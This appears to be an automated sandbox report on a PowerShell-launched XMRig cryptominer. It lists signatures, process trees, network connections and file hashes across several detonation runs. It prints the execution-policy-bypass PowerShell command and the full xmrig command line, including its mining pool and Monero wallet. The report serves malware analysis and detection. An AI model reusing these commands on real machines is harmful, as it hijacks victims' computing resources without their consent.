Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

memory/1680-3-0x00007FFA3D2B3000-0x00007FFA3D2B4000-memory.dmp

memory/1680-5-0x000002647EF10000-0x000002647EF32000-memory.dmp

memory/1680-8-0x00007FFA3D2B0000-0x00007FFA3DC9C000-memory.dmp

memory/1680-9-0x000002647F0C0000-0x000002647F136000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmo2zc4b.eef.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1680-11-0x00007FFA3D2B0000-0x00007FFA3DC9C000-memory.dmp

memory/1680-25-0x00007FFA3D2B0000-0x00007FFA3DC9C000-memory.dmp

memory/1680-29-0x00007FFA3D2B0000-0x00007FFA3DC9C000-memory.dmp

memory/1680-30-0x00007FFA3D2B3000-0x00007FFA3D2B4000-memory.dmp

memory/1680-31-0x00007FFA3D2B0000-0x00007FFA3DC9C000-memory.dmp

memory/1680-32-0x00007FFA3D2B0000-0x00007FFA3DC9C000-memory.dmp

memory/1680-52-0x000002647F590000-0x000002647F5A2000-memory.dmp

memory/1680-65-0x000002647F570000-0x000002647F57A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4644-94-0x0000016F9AB10000-0x0000016F9AB30000-memory.dmp

memory/4644-95-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-96-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-97-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-98-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-99-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-100-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-101-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-102-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-103-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-104-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-105-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-106-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-107-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-108-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-109-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-110-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-111-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-112-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-113-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-114-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-115-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-116-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-117-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-118-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-119-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-120-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-121-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-122-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-123-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-124-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-125-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-126-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-127-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-128-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-129-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-130-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-131-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-132-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-133-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-134-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-135-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-136-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-137-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-138-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-139-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-140-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-141-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-142-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-143-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-144-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-145-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-146-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-147-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-148-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-149-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-150-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-151-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-152-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-153-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-154-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-155-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-156-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

memory/4644-157-0x00007FF7CDFD0000-0x00007FF7CEC03000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.56:443 www.bing.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 56.61.62.23.in-addr.arpa udp
NL 23.62.61.56:443 www.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 129.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/2472-0-0x00007FFA18083000-0x00007FFA18085000-memory.dmp

memory/2472-10-0x0000020C85380000-0x0000020C853A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dsvebgo3.3ub.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2472-11-0x00007FFA18080000-0x00007FFA18B41000-memory.dmp

memory/2472-12-0x00007FFA18080000-0x00007FFA18B41000-memory.dmp

memory/2472-13-0x00007FFA18083000-0x00007FFA18085000-memory.dmp

memory/2472-14-0x00007FFA18080000-0x00007FFA18B41000-memory.dmp

memory/2472-16-0x00007FFA18080000-0x00007FFA18B41000-memory.dmp

memory/2472-17-0x0000020C85530000-0x0000020C85542000-memory.dmp

memory/2472-18-0x0000020C853B0000-0x0000020C853BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4312-49-0x000001F8B8290000-0x000001F8B82B0000-memory.dmp

memory/4312-50-0x000001F8B9BA0000-0x000001F8B9BC0000-memory.dmp

memory/4312-51-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-54-0x000001F8B9BC0000-0x000001F8B9BE0000-memory.dmp

memory/4312-53-0x000001F8B9BE0000-0x000001F8B9C00000-memory.dmp

memory/4312-52-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-55-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/2472-56-0x00007FFA18080000-0x00007FFA18B41000-memory.dmp

memory/4312-57-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-59-0x000001F8B9BC0000-0x000001F8B9BE0000-memory.dmp

memory/4312-58-0x000001F8B9BE0000-0x000001F8B9C00000-memory.dmp

memory/4312-60-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-61-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-62-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-63-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-64-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-65-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-66-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-67-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-68-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-69-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-70-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-71-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-72-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-73-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-74-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-75-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-76-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-77-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-78-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-79-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-80-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-81-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-82-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-83-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-84-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-85-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-86-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-87-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-88-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-89-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-90-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-91-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-92-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-93-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-94-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-95-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-96-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-97-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-98-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-99-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-100-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-101-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-102-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-103-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-104-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-105-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-106-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-107-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-108-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-109-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-110-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-111-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-112-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-113-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-114-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-115-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-116-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-117-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

memory/4312-118-0x00007FF6F5990000-0x00007FF6F65C3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
NL 23.62.61.168:443 www.bing.com tcp
US 8.8.8.8:53 168.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/1992-0-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp

memory/1992-1-0x0000020677DF0000-0x0000020677E12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jbymk3mz.hni.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

